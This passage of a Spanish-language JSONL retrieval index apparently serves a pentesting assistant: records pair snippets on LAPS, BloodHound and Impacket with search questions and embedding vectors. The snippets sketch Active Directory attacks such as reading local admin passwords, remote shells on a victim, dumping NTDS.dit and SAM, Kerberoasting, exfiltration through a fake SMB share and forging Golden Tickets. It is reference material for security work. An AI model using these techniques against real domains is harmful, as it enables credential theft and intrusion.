-0.05306, 0.00133, 0.0841, -0.04928, -0.04307, 0.03745, -0.04953, -0.03202, 0.00725, -0.00744, -0.10492, -0.05557, -0.01653, 0.02287, -0.03196, 0.02124, -0.02584]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo saber quiΓ©n puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista β†’ relacionado con ACL abuses.", "indexar": "cΓ³mo puedo identificar a los usuarios que tienen permisos para leer las contraseΓ±as", "v": [0.07933, 0.164, -0.07308, -0.15382, 0.04904, -0.10445, -0.03433, -0.07689, -0.14782, -0.12142, -0.0149, 0.00392, 0.06154, -0.10088, 0.07163, -0.06013, 0.1051, 0.06929, 0.0944, -0.01195, 0.03967, -0.07648, -0.10003, 0.06906, -0.06171, -0.01189, 0.05448, -0.0601, -0.08748, -0.00492, -0.06729, -0.04852, 0.02963, 0.01579, -0.05206, 0.0787, -0.02493, 0.09485, -0.02328, 0.12789, 0.107, 0.09765, -0.11728, 0.03391, 0.06237, -0.03347, -0.11463, 0.01928, 0.00831, -0.06568, -0.05119, -0.0339, -0.08292, -0.12209, -0.05373, -0.06255, 0.19115, 0.0231, 0.02624, 0.01236, -0.14656, 0.0187, 0.07511, 0.11804, -0.05273, -0.04048, 0.11919, 0.06747, -0.07688, 0.14413, -0.01234, 0.01535, -0.06785, 0.04109, 0.07064, 0.05384, -0.04184, -0.04011, 0.08995, 0.04206, 0.02789, 0.01968, -0.05265, -0.11137, -0.10393, -0.02196, -0.01997, -0.05176, 0.08373, -0.06421, 0.03888, 0.12014, 0.02, -0.01776, 0.02443, -0.02296, 0.0027, -0.00084, -0.14263, 0.00519, -0.04348, 0.06672, -0.00356, 0.19356, -0.03152, 0.01956, 0.03601, -0.0364, -0.00419, -0.07765, 0.02167, -0.00859, -0.07999, -0.03193, 0.04215, 0.02852, -0.01524, -0.13225, 0.03482, -0.02959, -0.03761, -0.07481, 0.02821, 0.01618, 0.09724, 0.03654, 0.004, 0.0838, -0.05163, -0.11366, -0.02827, -0.01646, -0.02876, 0.04825, -0.04045, 0.09032, -0.01508, -0.06671, -0.18753, 0.03876, -0.0069, -0.01083, 0.0067, 0.01011, 0.0471, 0.03704, -0.00881, -0.05389, -0.09782, -0.07253, -0.02305, 0.01832, -0.03741, 0.03343, -0.03553, 0.05041, -0.07032, -0.11539, -0.05481, 0.09969, 0.00614, -0.01339, -0.03099, 0.00221, -0.01571, -0.03638, -0.01564, 0.03026, 0.04639, 0.02244, -0.00266, 0.02983, 0.01865, -0.08576, 0.06887, -0.0317, 0.01031, -0.09045, -0.01181, -0.03577, -0.01627, -0.07374, -0.05065, -0.04683, -0.01676, -0.06479, 0.04275, -0.01044, -0.00256, 0.05906, 0.01106, 0.08366, -0.00572, 0.04132, 0.05095, -0.03798, -0.01728, -0.0146, -0.03634, -0.08038, 0.00302, 0.02029, -0.02978, -0.04684, 0.05751, -0.05571, -0.04061, -0.00035, -0.00952, -0.01589, 0.04857, -0.06496, 0.04196, -0.0764, -0.081, -0.013, -0.0251, 0.00571, -0.02449, -0.05929, 0.05129, 0.0554, 0.1011, 0.05893, 0.03182, -0.00327, 0.00134, 0.00048, 0.0401, 0.07213, 0.028, 0.05126, -0.05883, -0.00685, 0.10231, -0.01226, -0.02919, -0.03147, -0.0287, 0.01647, 0.00014, 0.06338, 0.03148, -0.0322, -0.04345, -0.03127, -0.06041, 0.01422, -0.03001, -0.03773, -0.02298, 0.02018, 0.05814, 0.00378, 0.02292, -0.04921]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo saber quiΓ©n puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista β†’ relacionado con ACL abuses.", "indexar": "con quΓ© programa detecto abusos en las polΓ­ticas de acceso", "v": [0.03532, 0.03982, -0.05597, -0.25757, 0.07124, 0.0238, -0.0068, -0.06848, -0.13998, 0.02807, -0.02009, 0.05074, -0.22935, 0.00494, 0.02506, -0.12606, 0.10761, -0.04663, 0.0948, 0.05371, -0.04565, -0.06024, 0.05303, 0.02937, -0.07268, 0.04759, 0.00823, -0.11506, 0.08954, -0.00421, -0.05501, 0.03467, -0.0305, -0.05036, 0.01508, 0.02629, -0.02608, -0.00266, 0.03803, 0.08707, 0.12496, -0.09748, -0.10461, -0.02888, 0.07525, -0.04368, -0.01249, 0.02162, -0.09012, -0.00043, -0.03943, 0.00146, -0.0804, -0.05472, 0.05343, -0.05985, -0.09265, 0.02745, -0.0116, 0.01604, -0.14016, 0.01993, 0.07738, 0.01017, 0.07597, -0.05248, 0.07205, 0.05156, -0.03235, 0.05255, 0.00588, -0.06112, 0.06682, 0.05461, 0.01319, 0.02527, -0.03694, -0.0689, 0.04396, -0.08526, -0.05564, 0.03932, -0.0234, 0.13934, -0.10937, -0.01577, 0.15807, 0.00966, -0.04034, -0.14957, 0.01143, 0.07119, 0.00671, -0.02618, 0.02571, -0.03824, 0.05833, -0.04811, 0.06468, 0.07429, 0.07782, -0.08084, -0.08568, 0.10905, 0.04557, 0.0286, 0.02084, -0.0191, -0.06, -0.00013, -0.03948, 0.03308, 0.01192, -0.02543, -0.00956, 0.05084, -0.03547, -0.06652, -0.02096, -0.14229, -0.14051, 0.01747, -0.03361, 0.02241, 0.08676, -0.05426, 0.00667, 0.03479, -0.03918, 0.10123, 0.09842, 0.00845, -0.01603, -0.01753, -0.06037, -0.12335, 0.01565, -0.01278, -0.03011, -0.03965, 0.0994, 0.11471, 0.05017, 0.0453, -0.00939, -0.06385, 0.02567, 0.09345, -0.01989, -0.02233, 0.02789, -0.00872, 0.00773, 0.0416, -0.06122, 0.00923, -0.00022, -0.05509, -0.0641, -0.00369, -0.07426, -0.10596, -0.05332, 0.04335, 0.16217, 0.01635, 0.02772, -0.02249, 0.00621, 0.04487, -0.06728, 0.07873, 0.06671, -0.04198, -0.04089, -0.06864, -0.03112, -0.10421, 0.00293, -0.05452, -0.12309, 0.06015, 0.04951, -0.03153, -0.02499, -0.03337, -0.11011, 0.01502, -0.00161, 0.01356, 0.04931, 0.01757, 0.02735, 0.0766, -0.0502, -0.06194, -0.02895, 0.04253, 0.0509, 0.0166, -0.02023, -0.031, -0.03082, -0.0343, -0.00394, 0.03865, 0.0281, -0.01972, 0.00887, 0.0336, 0.00436, -0.03431, 0.0332, -0.00938, -0.07752, -0.00266, -0.0217, 0.04163, 0.05901, 0.0192, -0.06796, 0.03636, 0.02789, -0.00187, -0.02551, -0.09954, 0.03599, 0.0081, 0.08024, 0.01802, 0.05066, 0.01351, -0.10993, -0.062, -0.05491, -0.05312, -0.0221, -0.06979, -0.0361, -0.11759, 0.00016, 0.05448, 0.05009, -0.05292, 0.00351, -0.03862, -0.08608, 0.01347, 0.03958, 0.01047, -0.02071, 0.02995, 0.07159, -0.0792, 0.05387, -0.02172]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nPassword de admin local de esa mΓ‘quina β†’ Movimiento lateral / RDP.\n\nRelacionado: BloodHound Β· OSCP MOC", "indexar": "que herramienta me sirve para encontrar el usuario administrador local de una mΓ‘quina?", "v": [0.01005, 0.10149, -0.11893, -0.28329, -0.07639, -0.11836, -0.16188, -0.04925, -0.05615, -0.0835, -0.0586, -0.06582, 0.04393, -0.05182, 0.07168, -0.02264, 0.1081, -0.13644, 0.02688, 0.08893, 0.03381, 0.04853, -0.00565, 0.05137, -0.08364, 0.04633, 0.10277, -0.10488, -0.21664, 0.01575, 0.05543, 0.02718, -0.0208, -0.0923, -0.05245, -0.10159, 0.03322, 0.02067, -0.03476, 0.11122, 0.05295, -0.00485, -0.13262, 0.07517, 0.06413, 0.07512, 0.00927, -0.08407, 0.05974, 0.13977, -0.07989, -0.21946, -0.107, 0.04324, 0.05221, -0.09965, 0.16593, -0.11225, 0.08301, -0.10883, -0.14842, -0.02112, -0.07405, 0.03055, -0.05261, 0.01267, 0.06883, -0.04624, -0.03416, -0.0033, -0.07911, 0.01426, 0.01003, -0.06759, 0.05404, 0.07107, 0.05574, 0.10015, 0.09415, -0.04245, 0.05894, -0.01966, -0.08669, -0.04614, -0.07575, -0.0793, 0.09747, -0.08121, 0.07017, -0.05843, 0.00211, 0.04489, 0.00485, -0.02844, 0.06052, -0.03249, 0.09562, -0.03864, -0.02289, 0.0305, 0.16238, -0.064, -0.02751, 0.10558, -0.02136, 0.01575, 0.0219, 0.00012, -0.0459, -0.03691, 0.11518, -0.00578, -0.02655, 0.03999, -0.04283, 0.08771, -0.01612, -0.02057, -0.05172, -0.00884, 0.02887, 0.01892, 0.01582, -0.06305, 0.00796, -0.00083, 0.01687, 0.08274, -0.02716, -0.0698, 0.00299, -0.04908, -0.02635, 0.043, -0.04589, 0.00741, 0.00369, -0.1121, -0.01138, -0.0394, -0.02226, 0.07385, -0.04875, -0.07547, 0.06104, -0.01796, 0.03917, -0.08007, -0.00091, -0.00622, 0.06063, -0.10098, 0.01172, 0.05482, -0.08006, 0.02599, 0.00927, 0.00117, -0.07629, 0.04069, -0.03444, -0.06583, 0.02937, 0.02506, -0.03723, -0.06609, -0.01795, 0.01818, 0.07772, -0.00585, -0.02148, 0.0268, 0.04531, -0.00026, -0.00763, -0.0379, -0.00956, -0.02715, 0.00239, -0.03003, 0.00019, 0.03839, -0.0197, 0.01233, -0.04142, -0.05061, 0.01324, 0.01402, -0.02238, 0.01387, 0.05402, 0.01345, -0.0023, -0.0666, 0.03901, -0.00828, 0.00827, -0.00358, -0.00163, -0.07263, -0.07399, -0.00562, -0.07024, 0.00864, 0.01321, 0.06745, -0.01749, -0.05203, 0.00139, 0.0071, 0.02113, 0.03794, 0.02549, 0.01335, -0.01446, -0.07101, 0.03937, -0.0105, -0.02915, -0.03707, 0.03178, -0.05261, 0.01244, 0.0129, 0.01246, -0.03794, 0.0306, -0.01262, 0.01681, 0.01951, -0.0237, 0.0002, 0.00151, -0.01889, 0.01314, -0.06313, 0.0557, -0.02091, -0.03846, -0.05402, -0.01232, 0.0512, 0.03926, -0.03845, -0.06432, -0.02559, -0.01233, -0.03094, -0.0725, -0.04911, -0.00528, -0.0214, 0.06662, -0.00634, -0.00882, 0.03196]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nPassword de admin local de esa mΓ‘quina β†’ Movimiento lateral / RDP.\n\nRelacionado: BloodHound Β· OSCP MOC", "indexar": "con que programa puedo hacer un movimiento lateral mediante RDP desde mi red?", "v": [-0.0966, 0.08439, -0.13675, -0.18843, -0.04569, 0.13202, 0.00811, 0.10334, -0.13196, -0.07215, 0.00187, -0.11257, 0.06604, -0.22785, 0.09672, 0.02057, -0.02519, 0.08595, 0.01155, -0.0833, -0.03172, -0.09377, -0.01425, -0.01671, 0.19933, 0.07299, 0.10126, -0.02213, -3e-05, -0.06766, 0.03533, 0.03806, -0.00771, -0.12367, -0.06131, -0.05966, 0.13458, 0.05692, 0.06526, -0.03686, -0.10626, -0.00076, -0.07684, 0.0251, 0.0628, 0.03881, -0.00095, -0.02092, -0.08703, -0.00782, 0.00255, 0.06418, -0.08536, -0.10937, -0.0077, -0.05337, 0.0727, -0.05832, -0.0419, -0.02738, 0.13648, 0.06642, -0.02313, -0.00017, 0.0432, -0.08149, 0.06607, -0.06369, -0.07279, 0.04558, -0.02416, 0.00965, -0.09798, 0.04162, -0.03255, 0.06326, -0.02541, -0.07029, 0.07946, -0.03889, -0.0867, 0.10105, -0.04924, 0.11311, -0.01498, -0.08749, 0.07526, -0.08105, 0.03708, 0.01138, 0.03658, 0.00458, 0.00943, 0.0992, 0.03098, -0.02071, -0.02608, 0.04947, -0.03165, 0.01799, 0.05262, 0.025, -0.10714, -0.06064, 0.05123, -0.04429, 0.13014, 0.0072, 0.0414, 0.10906, 0.00699, -0.01946, -0.0464, -0.0885, -0.02076, -0.01279, -0.14886, -0.02022, -0.01527, -0.0131, -0.01451, -0.03056, -0.1265, -0.06628, 0.05917, -0.05587, -0.05562, 0.04806, -0.09849, 0.0859, 0.06734, 0.06075, -0.02281, -0.12189, -0.07277, -0.05048, 0.03073, 0.01755, 0.10671, -0.06441, 0.02124, 0.04402, 0.02975, -0.02751, 0.03339, 0.0605, 0.0386, -0.06562, 0.0099, 0.08066, -0.02676, -0.00746, -0.01936, 0.00089, 0.0001, 0.06127, -0.00413, -0.02822, -0.08834, 0.02965, -0.0675, 0.06259, -0.10063, -0.06868, 0.05669, -0.0674, -0.01898, 0.04244, 0.07841, 0.01535, -0.07219, 0.06181, 0.02567, -0.04092, 0.01026, -0.01202, -0.05313, -0.10686, 0.06833, -0.0274, -0.04044, 0.05466, 0.05056, -0.00408, 0.06125, -0.04654, 0.01287, 0.00622, 0.07588, 0.00775, -0.04406, 0.02709, 0.01143, -0.02203, -0.02737, -0.02242, -0.03119, -0.0502, 0.04994, 0.01979, -0.08221, 0.01548, 0.0396, -0.02455, 0.02293, 0.05804, 0.00546, 0.0962, 0.03086, 0.0676, 0.03855, -0.03056, 0.13347, 0.01269, -0.06004, -0.00674, 0.00534, 0.04345, 0.02228, 0.02129, 0.05609, -0.02386, 0.0301, 0.05924, -0.02141, -0.08038, 0.05656, 0.03119, 0.00423, 0.02129, 0.03834, 0.01103, 0.03603, -0.0665, 0.01251, 0.0105, 0.07252, 0.02564, -0.07241, -0.02304, 0.01089, 0.01459, -0.01818, -0.02917, 0.02375, -0.01003, -0.07546, 0.04142, 0.04894, -0.02436, 0.00392, 0.03351, 0.01329, -0.08108, 0.04607, 0.03576]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "indexar": "ΒΏQuΓ© herramienta Python puedo usar para hablar con servicios Windows desde otra mΓ‘quina?", "v": [-0.14311, 0.0722, -0.0812, -0.23232, -0.07947, -0.14733, -0.14864, -0.0987, -0.06464, -0.09505, -0.04876, -0.0279, 0.00021, 0.01154, -0.10721, 0.01726, -0.0059, -0.08364, 0.08521, -0.01519, -0.05298, -0.00891, -0.1757, -0.06177, -0.01902, 0.07949, 0.10512, -0.05035, -0.17832, 0.07719, 0.00431, 0.04734, 0.07454, -0.03544, -0.11902, -0.04725, 0.02775, 0.14162, 0.12303, 0.02786, -0.04253, 0.02233, -0.03683, 0.10893, 0.04475, 0.02444, 0.0362, -0.05269, -0.02178, 0.09475, -0.0665, -0.22141, -0.07509, 0.00704, 0.05154, -0.13216, 0.14554, -0.0327, 0.01726, -0.07493, -0.09484, 0.02872, -0.08167, 0.0401, -0.0127, -0.05295, -0.01595, -0.05452, -0.0697, 0.15959, -0.10643, 0.02657, 0.02307, 0.03697, 0.07565, 0.00688, -0.09682, -0.02674, 0.06553, 0.0294, -0.00829, 0.00172, -0.02451, -0.02219, -0.02847, -0.11726, 0.04896, -0.04279, 0.0864, -0.11053, 0.0137, 0.08515, -0.03114, 0.00081, 0.03504, 0.04135, 0.05272, -0.05549, -0.01471, 0.02999, 0.13539, -0.05542, 0.0184, 0.12576, -0.07939, 0.02455, 0.01707, -0.05615, -0.11386, -0.06193, 0.07805, 0.02026, -0.05806, -0.02381, -0.06797, -0.05672, -0.02326, -0.03073, -0.0426, 0.04121, 0.03008, 0.0958, -0.03081, 0.00113, 0.00307, -0.03151, 0.01765, 0.11861, -0.09175, -0.03356, 0.05306, -0.0213, -0.04049, -0.02678, -0.04634, 0.08287, 0.09191, -0.0863, 0.05839, -0.05908, 0.0109, 0.07052, -0.03822, -0.02949, 0.01378, -0.01155, 0.06175, -0.04884, -0.05739, -0.03701, 0.14576, -0.06426, 0.00434, 0.04826, -0.06812, -0.00817, -0.04181, 0.0353, -0.06429, -0.02633, -0.03007, -0.07234, 0.02001, -0.03573, 0.05228, -0.00179, 0.00072, 0.03388, 0.05036, 0.01495, 0.03276, 0.02535, 0.05192, -0.01485, 0.01014, -0.02026, 0.00161, 0.00945, -0.02589, -0.08737, -0.06043, 0.00112, -0.06513, -0.08048, 0.04876, 0.02406, -0.01106, 0.01745, -0.02976, -0.01593, -0.06586, 0.02564, 0.04558, -0.0909, 0.02382, -0.01922, -0.03331, -0.02076, 0.05491, -0.04745, -0.05473, 0.02783, -0.06718, -0.01415, 0.03335, 0.09479, -0.05268, -0.04513, 0.02295, 0.00837, 0.0183, 0.03646, 0.02306, -0.02929, 0.01881, -0.04083, -0.02273, 0.04817, -0.00356, -0.01899, -0.00869, -0.01789, 0.04375, 0.02163, 0.01829, -0.01691, 0.00199, -0.01066, 0.02061, 0.0019, -0.01559, 0.00017, 0.02441, -0.00916, -0.01648, -0.03945, 0.02668, -0.05033, -0.05261, -0.02467, -0.03717, 0.07592, 0.00843, -0.03852, -0.03968, -0.00072, -0.0102, 0.00334, -0.07406, -0.05074, -0.00302, -0.00726, 0.02212, -0.05515, -0.0424, 0.08372]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "indexar": "ΒΏCon quΓ© programa en Kali puedo acceder a protocolos SMB y Kerberos de forma no oficial?", "v": [-0.12071, -0.05715, 0.03191, 0.02461, 0.00594, -0.29423, 0.10412, -0.02773, -0.18282, -0.10359, -0.14948, 0.06097, 0.13017, -0.25342, 0.02772, 0.13662, 0.01429, -0.14779, 0.06823, 0.0882, 0.10278, 0.05769, -0.00355, -0.01277, 0.02833, 0.00734, 0.05993, 0.00287, 0.03223, -0.10721, -0.04724, -0.03152, 0.02038, -0.08067, 0.04814, 0.08288, 0.00887, 0.12988, -0.01695, 0.05849, -0.02728, -0.06349, 0.11962, -0.00143, 0.06935, -0.03071, 0.0449, 0.01086, 0.01953, -0.06774, 0.03593, 0.03534, -0.03761, 0.04053, -0.1345, -0.07547, 0.06183, -0.14913, -0.06923, 0.02702, -0.02797, -0.06448, -0.00768, -0.0093, 0.04967, -0.15126, 0.06096, 0.08017, -0.13707, 0.01995, -0.00059, -0.01491, 0.09444, -0.01433, -0.02325, 0.05909, -0.13101, -0.05869, 0.04193, 0.02554, 0.00322, 0.02963, 0.10391, 0.15152, -0.05321, -0.07264, 0.00346, -0.05918, -0.06031, -0.0802, 0.00822, 0.09311, 0.0234, 0.0866, 0.04625, -0.08067, -0.0576, 0.06779, 0.03923, 0.08673, -0.04923, -0.01769, -0.10313, 0.06555, -0.08184, 0.06325, 0.03565, -0.02328, 0.02315, -0.00213, -0.01679, 0.03813, -0.08025, -0.04185, -0.07914, 0.09068, -0.07601, -0.04144, -0.01124, -0.04137, -0.10788, 0.03421, -0.02341, -0.04665, 0.01916, -0.01622, -0.00891, 0.148, -0.05244, 0.01703, 0.02966, 0.03746, 0.00247, -0.01145, -0.00514, -0.07409, -0.07124, -0.027, -0.00464, -0.00851, -0.01421, 0.01744, -0.03981, 0.01459, -0.0325, -0.07897, -0.03237, -0.06136, -0.07572, 0.00688, 0.03822, 0.05954, -0.01361, 0.04788, -0.06364, -0.0237, 0.00017, -0.02166, -0.06644, 0.0783, -0.07111, 0.04327, -0.02444, 0.00619, 0.06354, 0.03634, -0.00012, -0.01252, 0.02517, 0.10661, -0.03216, 0.12555, 0.0434, -0.07652, -0.01926, -0.01195, 0.0097, -0.08316, 0.01961, -0.01709, -0.05804, 0.03669, 0.02533, 0.00558, -0.01782, -0.04214, 0.0377, 0.0415, 0.00424, 0.00469, -0.01021, 0.024, 0.00346, 0.03086, -0.01092, 0.00437, 0.01446, 0.04668, 0.00275, -0.03504, -0.06179, -0.00418, 0.02159, -0.03734, 0.04043, 0.08429, -0.05229, -0.00365, -0.00541, 0.09961, 0.04271, -0.05992, 0.06677, 0.01027, -0.02069, -0.02257, -0.00262, 0.03381, 0.10805, 0.01506, -0.03165, 0.01059, 0.03588, 0.02768, 0.00401, -0.09189, -0.0187, 0.00996, -0.02333, -0.0162, -0.00194, 0.0135, 0.01265, 0.01607, 0.02265, 0.02971, -0.04465, 0.01148, -0.02874, -0.0557, -0.01247, 0.01466, 0.02891, -0.00379, -0.0039, -0.02094, -0.06138, -0.02868, -0.00673, 0.00864, -0.03302, 0.00634, 0.02482, -0.0315, -0.01184, -0.01409]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "indexar": "ΒΏExiste alguna suite de scripts que me permita interactuar como si fuera el propio sistema operativo Windows?", "v": [0.01711, 0.18453, -0.15561, -0.13629, -0.03081, -0.18507, -0.07927, -0.16475, -0.01308, -0.08308, -0.02415, -0.10187, 0.02382, -0.04593, 0.03913, -0.02271, 0.09195, -0.03518, -0.00849, -0.05596, -0.06278, 0.00592, -0.01056, 0.03103, -0.0824, -0.0029, -0.00065, -0.02991, -0.15468, -0.06281, -0.00886, 0.07449, 0.10515, -0.15219, -0.03615, -0.02961, -0.01012, 0.02936, 0.13413, 0.06175, 0.07761, 0.01284, -0.04514, 0.13164, 0.15545, -0.05756, 0.0068, -0.07073, 0.04282, -0.04096, -0.06751, -0.09173, -0.09728, -0.04026, 0.07797, -0.12858, 0.16938, -0.12534, -0.00128, 0.04861, -0.0084, 0.07531, 0.00467, -0.02017, 0.06632, 0.00036, 0.07826, -0.09608, 0.01285, 0.1342, -0.05151, 0.04514, 0.00994, 0.04281, 0.08061, 0.0835, -0.05651, -0.04556, 0.03539, -0.01467, 0.01883, 0.03015, -0.02064, -0.0185, 0.03968, -0.14809, -0.07522, -0.07584, -0.08378, -0.01148, 0.13065, -0.07739, -0.09622, 0.03426, 0.05277, -0.16858, -0.01189, 0.04566, 0.01181, 0.09968, -0.08153, -0.0597, -0.12649, 0.03767, -0.07074, 0.00059, 0.079, -0.02647, 0.01578, -0.04643, -0.00403, 0.01599, -0.01434, -0.02901, -0.03272, -0.00545, -0.03035, -0.07038, -0.02497, -0.00647, -0.13082, 0.06652, -0.03446, -0.00462, -0.00792, -0.0844, -0.04101, 0.10573, 0.00175, 0.02838, -0.0388, -0.00109, -0.05195, -0.07218, -0.07654, 0.09452, 0.05278, 0.05144, 0.02907, -0.05016, 0.07026, 0.07116, 0.14062, 0.00174, 0.05782, 0.02111, 0.05315, -0.05425, -0.00978, -0.04064, 0.02448, 0.00126, -0.0411, 0.01625, -0.02186, -0.02416, 0.04257, 0.04176, 0.02353, -0.04869, -0.03819, -0.00242, -0.0344, 0.03497, -0.00967, -0.02162, -0.06698, -0.0004, 0.0606, 0.04601, -0.05757, 0.05843, 0.05416, -0.05715, 0.00435, -0.00437, -0.02538, -0.07057, -0.02296, 0.02529, -0.07289, 0.03477, 0.05441, -0.06409, -0.0403, 0.00256, -0.07823, 0.03378, -0.02596, 0.02492, 0.01069, 0.04849, 0.01655, -0.04935, -0.01842, -0.02799, -0.04649, -0.06489, 0.05547, -0.00207, -0.06654, 0.07577, 0.05097, -0.09405, 0.05281, 0.07934, 0.01855, 0.02917, 0.00836, 0.01145, 0.02981, 0.02607, 0.06323, -0.04009, -0.04472, -0.04396, 0.02895, 0.00618, 0.01418, -0.04349, 0.06255, 0.01351, 0.08147, -0.00447, 0.01599, 3e-05, -0.00361, 0.02489, -0.02752, -0.02281, -0.02866, -0.06718, -0.03787, -0.02122, 0.0473, -0.00996, 0.01959, -0.02488, -0.04852, -0.06479, 0.00946, 0.05625, -0.02465, -0.12942, -0.05603, -0.05093, -0.05708, -0.00704, -0.00391, -0.07236, -0.01281, 0.0096, 0.02394, -0.01703, 0.01391, 0.03165]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los mΓ‘s ΓΊtiles\n```\nimpacket-psexec β†’ shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutar comandos sin tocar disco\nimpacket-smbexec β†’ otra ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca NTDS.dit y SAM de un DC en remoto β†’ secretsdump\nimpacket-GetUserSPNs β†’ Kerberoasting\nimpacket-GetNPUsers β†’ AS-REP Roasting\nimpacket-getTGT β†’ pide/forja un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx β†’ relay NTLM\nimpacket-ticketer β†’ forja tickets β†’ Golden Ticket\n```", "indexar": "que herramienta sirve para ejecutar comandos en una vΓ­ctima sin tocar el disco?", "v": [0.04279, 0.02031, -0.27252, -0.09031, -0.02363, -0.14613, -0.05752, 0.04761, 0.06059, -0.0334, 0.02745, -0.04594, 0.03845, -0.053, 0.0664, -0.03748, 0.18668, -0.02089, -0.00407, -0.01417, 0.00806, -0.0817, 0.03802, 0.00307, -0.00694, -0.02598, 0.01709, 0.01649, -0.19552, 0.02791, -0.0118, -0.0446, 0.01512, -0.13542, 0.05619, -0.12489, -0.07311, -0.07554, 0.07883, 0.17625, -0.00088, 0.05408, -0.16005, 0.02651, -0.0059, -0.04925, 0.04444, 0.03014, 0.09367, 0.05852, 0.05806, -0.04367, -0.16178, -0.1121, -0.05947, -0.15334, 0.15348, -0.09101, 0.10092, 0.02365, -0.05737, -0.07926, 0.02802, 0.08316, 0.08244, -0.01894, 0.07086, -0.13207, 0.02359, 0.10227, -0.10839, 0.06224, 0.0442, 0.02345, 0.02714, -0.1028, 0.03499, -0.00854, 0.0568, -0.04882, 0.02055, -0.02857, -0.13773, 0.04043, -0.12526, -0.00864, 0.0842, -0.01272, 0.01504, -0.07316, 0.05652, -0.00059, -0.02667, 0.02505, 0.09121, -8e-05, 0.07403, -0.01706, 0.04693, -0.05433, 0.20969, -0.08887, -0.06037, 0.00704, 0.08219, -0.00491, -0.00882, -0.02386, -0.03336, 0.05269, 0.02625, 0.03721, 0.04517, -0.05546, -0.03357, -0.02588, -0.01735, -0.05249, -0.00752, 0.03723, -0.00198, 0.09613, 0.0015, -0.02442, -0.02493, 0.01654, -0.04287, 0.00876, 0.01167, -0.02754, 0.04691, -0.02668, 0.06486, 0.00728, 0.03321, 0.07879, 0.03424, -0.06126, -0.03606, -0.09365, 0.12144, 0.09827, -0.07948, -0.03626, 0.02388, -0.00258, 0.06517, 0.01016, -0.03776, 0.01871, 0.08552, 0.00666, -0.05403, 0.01889, -0.08817, -0.04206, -0.04124, 0.01686, -0.04612, 0.02035, 0.00052, -0.02427, -0.03233, 0.01554, -0.01336, -0.03499, 0.03922, -0.03277, 0.10339, 0.06555, 0.00856, 0.0013, 0.06543, 0.03094, -0.01754, -0.15452, -0.02963, -0.00813, 0.04344, 0.00238, 0.00683, 0.01721, -0.0816, -0.05538, 0.01533, -0.04022, -0.00719, -0.02584, -0.04667, 0.03902, 0.03613, 0.05576, -0.00281, -0.04105, 0.01771, -0.02741, -0.0005, 0.02978, -0.10142, 0.00171, -0.08493, -0.01638, 0.00408, -0.06459, 0.07643, 0.05668, -0.03132, 0.01155, -0.02226, 0.00236, 0.01938, 0.01925, 0.03177, -0.00141, 0.01557, -0.06964, 0.0321, 0.04761, -0.00546, 0.05559, -0.03477, 0.0073, 0.09447, -0.07558, -0.00586, 0.0488, -0.00645, 0.00155, 0.04863, -0.00128, 0.02537, -0.00236, -0.00995, -0.00024, 0.01448, -0.0316, 0.0062, -0.01145, -0.07603, -0.03609, -0.02082, 0.02891, -0.00202, -0.07875, -0.00361, -0.03424, -0.04459, -0.01469, -0.05789, -0.06477, -0.00277, 0.03948, 0.06392, -0.0697, -0.00767, -0.01305]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los mΓ‘s ΓΊtiles\n```\nimpacket-psexec β†’ shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutar comandos sin tocar disco\nimpacket-smbexec β†’ otra ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca NTDS.dit y SAM de un DC en remoto β†’ secretsdump\nimpacket-GetUserSPNs β†’ Kerberoasting\nimpacket-GetNPUsers β†’ AS-REP Roasting\nimpacket-getTGT β†’ pide/forja un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx β†’ relay NTLM\nimpacket-ticketer β†’ forja tickets β†’ Golden Ticket\n```", "indexar": "cual es la opcion libre para hacer un golden ticket con credenciales conocidas?", "v": [-0.00142, -0.00153, -0.11832, 0.12568, 0.02345, -0.08944, 0.01381, -0.01183, -0.07498, -0.11462, -0.05939, 